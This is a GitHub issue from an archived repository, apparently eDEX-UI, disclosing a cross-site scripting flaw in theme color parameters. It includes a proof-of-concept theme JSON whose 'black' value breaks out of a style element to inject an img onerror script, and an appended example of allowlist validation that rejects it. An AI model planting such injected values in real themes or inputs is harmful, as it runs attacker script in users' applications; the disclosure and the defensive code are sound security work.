This repository was archived by the owner on Oct 22, 2021. It is now read-only.
HTML/JS Injection in color variable #649
Closed
Technical information
Using version:
- master (running from GitHub-published source code, currently v3.0.0-pre)
- latest (latest release, currently v2.2.2)
- vX.X.X (specify other version)
Running on:
- Linux
- Windows
- macOS
How comfortable you are with your system and/or IT in general:
- I'm kind of lost, honestly
- I know what's up, I could help you run some commands or checks
- My machine is fully under my control, tell me what you need
- I attended Defcon last year (Not really Defcon, but similar)
Problem
Color parameters are not properly filtered, and thus allow custom HTML and JS to be injected using a custom theme with a malformed color parameter.
Proof Of Concept:
{
    "colors": {
        "r": 170,
        "g": 207,
        "b": 209,
        "black": "#000000</style><img src=\"\" onerror=\"alert('XSS')\"></img><style class=\"theming\"> :root{ --color_black: #000000",
        "light_black": "#05080d",
        "grey": "#262828"
    },
    "cssvars": {
        "font_main": "United Sans Medium",
        "font_main_light": "United Sans Light"
    },
    "terminal": {
        "fontFamily": "Fira Mono",
        "cursorStyle": "block",
        "foreground": "#aacfd1",
        "background": "#05080d",
        "cursor": "#aacfd1",
        "cursorAccent": "#aacfd1",
        "selection": "rgba(170,207,209,0.3)"
    },
    "globe": {
        "base": "#000000",
        "marker": "#aacfd1",
        "pin": "#aacfd1",
        "satellite": "#aacfd1"
    }
}

P.S. It would be nice to have a proper way to inject custom HTML and JS into the app so that we could add some custom widgets and functionality to our themes. To make this secure, maybe have the custom code be disabled unless the user specifically allows "unsafe" theme options.
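
An added example, not part of the original issue and not eDEX-UI's own code: allowlist validation of the "colors" section before any value is written into a style element, run against the value from the proof of concept. The function names are hypothetical, and the `--color_<key>` naming is assumed from the `--color_black` variable visible in the report.

```javascript
// Added example: accept only well-formed colors, reject everything else.
const HEX_COLOR = /^#(?:[0-9a-fA-F]{3}|[0-9a-fA-F]{6})$/;
const RGB_FUNC = /^rgba?\(\d{1,3},\s?\d{1,3},\s?\d{1,3}(?:,\s?(?:0|1|0?\.\d+))?\)$/;
// Keys end up in the CSS variable name, so they are validated as well.
const KEY_NAME = /^[a-z][a-z0-9_]*$/;

const isChannel = (v) => Number.isInteger(v) && v >= 0 && v <= 255;
const isColor = (v) =>
  typeof v === "string" && (HEX_COLOR.test(v) || RGB_FUNC.test(v));

// Returns the "colors.<key>" paths that fail validation (empty array = clean).
function findBadColors(theme) {
  const bad = [];
  for (const [key, value] of Object.entries(theme.colors || {})) {
    const valueOk = ["r", "g", "b"].includes(key) ? isChannel(value) : isColor(value);
    if (!KEY_NAME.test(key) || !valueOk) bad.push(`colors.${key}`);
  }
  return bad;
}

// Hypothetical builder: refuses the whole theme instead of stripping characters,
// so a value that escapes the CSS context never reaches the document.
function buildColorCss(theme) {
  const bad = findBadColors(theme);
  if (bad.length > 0) throw new Error(`rejected theme values: ${bad.join(", ")}`);
  const vars = Object.entries(theme.colors || {})
    .map(([key, value]) => `--color_${key}: ${value};`)
    .join(" ");
  return `:root{ ${vars} }`;
}

// Constructed inputs: a clean theme and one carrying the value from the report.
const cleanTheme = {
  colors: { r: 170, g: 207, b: 209, black: "#000000", grey: "#262828" },
};
const reportedTheme = {
  colors: {
    ...cleanTheme.colors,
    black: "#000000</style><img src=\"\" onerror=\"alert('XSS')\"></img>" +
      "<style class=\"theming\"> :root{ --color_black: #000000",
  },
};

console.log(findBadColors(cleanTheme));    // no findings
console.log(findBadColors(reportedTheme)); // flags colors.black
```

Writing the generated text through `textContent` of a style element created with `document.createElement`, rather than concatenating it into an HTML string, adds a second layer: the HTML parser never sees the value.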